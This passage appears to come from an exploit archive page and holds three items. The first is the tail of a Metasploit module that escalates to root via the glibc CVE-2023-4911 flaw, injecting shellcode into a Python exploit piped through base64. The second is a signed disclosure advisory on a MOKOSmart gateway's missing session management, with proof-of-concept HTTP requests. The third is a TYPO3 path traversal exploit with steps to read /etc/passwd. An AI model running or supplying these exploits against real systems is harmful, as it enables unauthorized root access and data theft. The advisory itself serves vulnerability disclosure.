'https://ubuntu.com/security/CVE-2023-4911']<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => [ 'linux', 'unix' ],<br /> 'Arch' => [ ARCH_X86, ARCH_X64 ],<br /> 'SessionTypes' => [ 'shell', 'meterpreter' ],<br /> 'Targets' => [[ 'Auto', {} ]],<br /> 'Privileged' => true,<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'PrependSetresgid' => true,<br /> 'PrependSetresuid' => true,<br /> 'WfsDelay' => 600<br /> },<br /> 'DisclosureDate' => '2023-10-03',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE, ],<br /> 'SideEffects' => [ ],<br /> 'Reliability' => [ REPEATABLE_SESSION, ]<br /> }<br /> )<br /> )<br /> register_advanced_options([<br /> OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ])<br /> ])<br /> end<br /><br /> def find_exec_program<br /> %w[python python3].select(&method(:command_exists?)).first<br /> rescue StandardError => e<br /> fail_with(Failure::Unknown, "An error occurred finding a version of python to use: #{e.message}")<br /> end<br /><br /> def check<br /> glibc_version = cmd_exec('ldd --version')&.scan(/ldd\s+\(\w+\s+GLIBC\s+(\S+)\)/)&.flatten&.first<br /> return CheckCode::Unknown('Could not get the version of glibc') unless glibc_version<br /><br /> sysinfo = get_sysinfo<br /> case sysinfo[:distro]<br /> when 'ubuntu'<br /> # Ubuntu's version looks like: 2.35-0ubuntu3.4. The following massaging is necessary for Rex::Version compatibility<br /> test_version = glibc_version.gsub(/-\d+ubuntu/, '.')<br /> if Rex::Version.new(test_version).between?(Rex::Version.new('2.35'), Rex::Version.new('2.35.3.4')) ||<br /> Rex::Version.new(test_version).between?(Rex::Version.new('2.37'), Rex::Version.new('2.37.2.1')) ||<br /> Rex::Version.new(test_version).between?(Rex::Version.new('2.38'), Rex::Version.new('2.38.6'))<br /> return CheckCode::Appears("The glibc version (#{glibc_version}) found on the target appears to be vulnerable")<br /> end<br /> when 'debian'<br /> # Debian's version looks like: 2.36-9+deb12u1. The following massaging is necessary for Rex::Version compatibility<br /> test_version = glibc_version.gsub(/\+deb/, '.').gsub(/u/, '.').gsub('-', '.')<br /> if Rex::Version.new(test_version).between?(Rex::Version.new('2.31'), Rex::Version.new('2.31.13.11.7')) ||<br /> Rex::Version.new(test_version).between?(Rex::Version.new('2.36'), Rex::Version.new('2.36.9.12.3'))<br /> return CheckCode::Appears("The glibc version (#{glibc_version}) found on the target appears to be vulnerable")<br /> end<br /> else<br /> return CheckCode::Unknown('The module has not been tested against this Linux distribution')<br /> end<br /> CheckCode::Safe("The glibc version (#{glibc_version}) found on the target does not appear to be vulnerable")<br /> end<br /><br /> def check_ld_so_build_id<br /> # Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so<br /> if !command_exists?('file')<br /> print_warning('Unable to locate the `file` command ti order to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.')<br /> return<br /> end<br /> file_cmd_output = ''<br /><br /> # This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not<br /> # defined on the path like it is on Debian. Also Ubuntu doesn't have ldconfig install by default.<br /> sysinfo = get_sysinfo<br /> case sysinfo[:distro]<br /> when 'ubuntu'<br /> if command_exists?('ldconfig')<br /> file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")')<br /> end<br /> when 'debian'<br /> file_cmd_output = cmd_exec('file "$(readlink -f "$(command -v ld.so)")"')<br /> else<br /> fail_with(Failure::NoTarget, 'The module has not been tested against this Linux distribution')<br /> end<br /><br /> if file_cmd_output =~ /BuildID\[.+\]=(\w+),/<br /> build_id = Regexp.last_match(1)<br /> if BUILD_IDS.keys.include?(build_id)<br /> print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.")<br /> else<br /> fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.")<br /> end<br /> else<br /> print_warning('Unable to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.')<br /> end<br /> end<br /><br /> def exploit<br /> fail_with(Failure::BadConfig, 'Session already has root privileges') if is_root?<br /><br /> python_binary = find_exec_program<br /> fail_with(Failure::NotFound, 'The python binary was not found.') unless python_binary<br /> vprint_status("Using '#{python_binary}' to run the exploit")<br /><br /> check_ld_so_build_id<br /><br /> # The python script assumes the working directory is the one we can write to.<br /> cd(datastore['WritableDir'])<br /> shell_code = payload.encoded.unpack('H*').first<br /><br /> exploit_data = exploit_data('CVE-2023-4911', 'cve_2023_4911.py')<br /> exploit_data = exploit_data.gsub('METASPLOIT_SHELL_CODE', shell_code)<br /> exploit_data = exploit_data.gsub('METASPLOIT_BUILD_IDS', BUILD_IDS.to_s.gsub('=>', ':'))<br /><br /> # If there is no response from cmd_exec after the brief 15s timeout, this indicates exploit is running successfully<br /> output = cmd_exec("echo #{Rex::Text.encode_base64(exploit_data)} |base64 -d | #{python_binary}")<br /> if output.blank?<br /> print_good('The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.')<br /> else<br /> print_line(output)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA256<br /><br /># MOKOSmart MKGW1 Gateway Improper Session Management #<br /><br />Link: https://github.com/sbaresearch/advisories/tree/public/2022/SBA-ADV-20220120-01_MOKOSmart_MKGW1_Gateway_Improper_Session_Management<br /><br />## Vulnerability Overview ##<br /><br />MOKOSmart MKGW1 Gateway devices with firmware version 1.1.1 or below do<br />not provide an adequate session management for the administrative web<br />interface. This allows adjacent attackers with access to the management<br />network to read and modify the configuration of the device.<br /><br />* **Identifier** : SBA-ADV-20220120-01<br />* **Type of Vulnerability** : Improper Authentication<br />* **Software/Product Name** : [MOKOSmart MKGW1 BLE Gateway](https://www.mokosmart.com/mokosmart-mkgw1-gateway-iot-cloud-platform/)<br />* **Vendor** : [MOKO TECHNOLOGY LTD](https://www.mokosmart.com/)<br />* **Affected Versions** : <= 1.1.1<br />* **Fixed in Version** : Not yet<br />* **CVE ID** : Pending<br />* **CVSS Vector** : CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H<br />* **CVSS Base Score** : 8.0 (High)<br /><br />## Vendor Description ##<br /><br />> * MKGW1 Bluetooth gateway is mainly used for the MOKO Bluetooth products.<br />> * It is convenient for users to get the data of the MOKO series Beacon,<br />> and advertising raw data of any Bluetooth device.<br />> * It can upload the data to the server via MQTT (V3.1.1) or HTTP(S)<br />> protocol.<br />> * MKGW1 was developed with MediaTek® MT7688AN relying on OpenWrt system<br />> and Nordic® nRF52 platform.<br />> * MKGW1 can connect the standard MQTT Broker, Aws IOT, Azure IOT HUB,<br />> Aliyun IOT.<br /><br />Source: <http://doc.mokotechnology.com/index.php?s=/page/108><br /><br />## Impact ##<br /><br />By exploiting the documented vulnerability, an attacker can gain<br />administrative access to the device. For example, this can be misused by<br />altering the configuration of the device or by reading out the configured<br />network credentials and therefore getting a foothold in the victim's network.<br /><br />## Vulnerability Description ##<br /><br />The gateway offers a web-based configuration interface that can be used to<br />edit the configuration of the gateway. Username and password are requested<br />to authenticate the administrator. After sending the correct credentials the<br />device sets a global server-side state to "logged in" for 3600 seconds,<br />rather than issuing a session ID. Now any device on the same network can<br />access the configuration interface as administrator without any additional<br />authentication and read and modify the configuration.<br /><br />## Proof of Concept ##<br /><br />Login with the admin credentials on the web interface from a legitimate<br />client:<br /><br />HTTP request:<br /><br />```http<br />POST /goform/login HTTP/1.1<br />Host: 192.168.22.1<br />Content-Type: application/json<br />Content-Length: 39<br />Origin: http://192.168.22.1<br />Connection: close<br />Referer: http://192.168.22.1/sign_in<br /><br />{"username":"Admin","password":"[redacted]"}<br />```<br /><br />HTTP response:<br /><br />```http<br />HTTP/1.1 200 OK<br />Content-type: application/json<br />Pragma: no-cache<br />Cache-Control: no-cache<br /><br />{ "state": { "code": 2000, "msg": "ok" }, "data": { "activetime": "3600" } }<br />```<br /><br />The response shown above does not contain any session identifier.<br />On another client that can reach the web interface, an attacker can read out<br />the configuration without any authentication:<br /><br />HTTP request:<br /><br />```http<br />GET /goform/get_wan HTTP/1.1<br />Host: 192.168.22.1<br />Connection: close<br />```<br /><br />HTTP response:<br /><br />```http<br />HTTP/1.1 200 OK<br />Content-type: application/json<br /><br />{ "state": { "code": 2000, "msg": "ok" }, "data": { "wanmode": "WIFI", "wanssid": "[redacted]", "wanencrypt": "[redacted]", "wanpassword": "[redacted]", "proto": "dhcp", "ipaddr": "", "netmask": "", "gateway": "", "firdns": "", "secdns": "" } }<br />```<br /><br />The above proof-of-concept shows that the MOKO gateway cannot distinguish<br />between multiple sessions. Therefore, if a legitimate client is logged in,<br />an attacker can read the configuration. Furthermore, an attacker can also<br />modify the configuration by sending the appropriate `JSON` data to the<br />respective `POST` endpoint. Changes to the network can trigger a reboot<br />of the device.<br /><br />## Recommended Countermeasures ##<br /><br />We are not aware of a vendor fix yet. Please contact the vendor.<br /><br />We recommend to implement a proper session management for the<br />administrative web interface of the device.<br /><br />## Timeline ##<br /><br />* `2022-01-20`: identification of vulnerability in version 1.1.1<br />* `2022-01-27`: initial vendor contact<br />* `2022-03-02`: disclosed vulnerability to vendor contact but received no reply<br />* `2023-12-11`: request CVE from MITRE<br />* `2023-12-12`: public disclosure<br /><br />## References ##<br /><br />* [Moko Gateway Documentation](https://www.mokosmart.com/wp-content/uploads/2019/10/GS-gateway.pdf)<br /><br />## Credits ##<br /><br />* Jakob Hagl ([SBA Research](https://www.sba-research.org/))<br />* David Lisa Gnedt ([SBA Research](https://www.sba-research.org/))<br />-----BEGIN PGP SIGNATURE-----<br /><br />iQIzBAEBCAAdFiEEL9Wp/yZWFD9OpIt6+7iGL1j3dbIFAmWB8iQACgkQ+7iGL1j3<br />dbK0eg//atfWytZOUPJ3omp9Rjb9sMJwu1Z8LdEZZGsQdsmQXJLaKF3AUDnt2cBx<br />CLPVDh32lFbszJiMrJrXjj5WxH8CUtNQFdj1WTN4Uv5MlaRRvipOz7/XTemqRwGP<br />+nctTDZHLFCeli4ZD36tE4zKcP3vm+R4e7Zy5BIP74G2Dw2hmFreSt7CC5CqZT3K<br />oPo1hMF9PD7WhjYK/lBaxeR+6FkiCm7p/thgyeShHMVygJJjmjF+k3GQ61NmoVXc<br />IjwRs+WY8Y/X/SfPjM8tjW/gZFHdOv/r/Gcz1OJs2D2quqmiKuoOhS9b/F8LDHsf<br />OnKTNBaWH2oTzmuh7zSan+kPYj42gjpp+aSSoWK7At78yFFvLilCcckwIpKagh4U<br />b3W//s5BPKCXJ1a7yH3WYGjbDAOzGMq1g50X1ZDNQ7zdQbELobFSNLWsnPwfN64i<br />ljq6tXTOYT+4Jg4hI5I+3vD4q7mf7O2CL4fk5pUHoKMy7P28sxa7wX2jH+02C07J<br />PKkaU+V2v4Lvf3PQvGTeupo50bTZX0xYqdmjjr3G9SUD+jESMCHPGaXw/Zpau71U<br />uKD9f9MbZ9v/XML3IsBvd22QkayL7eegvmweyLmchp/ppigp99IX3rA7EgGkauW7<br />1W7YiybQOvo5xaCiMakIqHXZtFcWIEryT8FRMW5cyraExHGkPPk=<br />=jrYM<br />-----END PGP SIGNATURE-----<br /><br /></code></pre>
<pre><code># Exploit Title: TYPO3 11.5.24 Path Traversal Vulnerability (Authenticated)<br /># Date: Apr 9, 2023<br /># Exploit Author: Saeed reza Zamanian<br /># Software Link: https://get.typo3.org/release-notes/11.5.24<br /># Version: 11.5.24<br /># Tested on: Kali 2022.3<br /># CVE : CVE-2023-30451<br /><br /><br /> In TYPO3 11.5.24, the filelist component allows attackers (with access to the administrator panel),<br /> to read arbitrary files by utilizing a directory traversal via the baseuri field, This is demonstrated through :<br /> POST /typo3/record/edit with ../../../ and the parameter<br /> data[sys_file_storage]*[data][sDEF][lDEF][basePath][vDEF].<br /> <br />-----------------------------------------------------<br />To exploit this vulnerability, follow these steps:<br /><br />1. Log in to the administrator panel.<br />2. Navigate to 'file' > 'Filelist' section.<br />3. Right-click on a file storage and select 'New.'<br />4. Set the base URI to "../../../" and save.<br /><br />After creating the file storage, the final HTTP request should resemble the one below. Once the file storage is created, refresh the page, enabling you to browse any directory on the server.<br /><br />To access "/etc/passwd," browse to the '/etc/' directory, search for 'passwd,' and view the file.<br /></code></pre>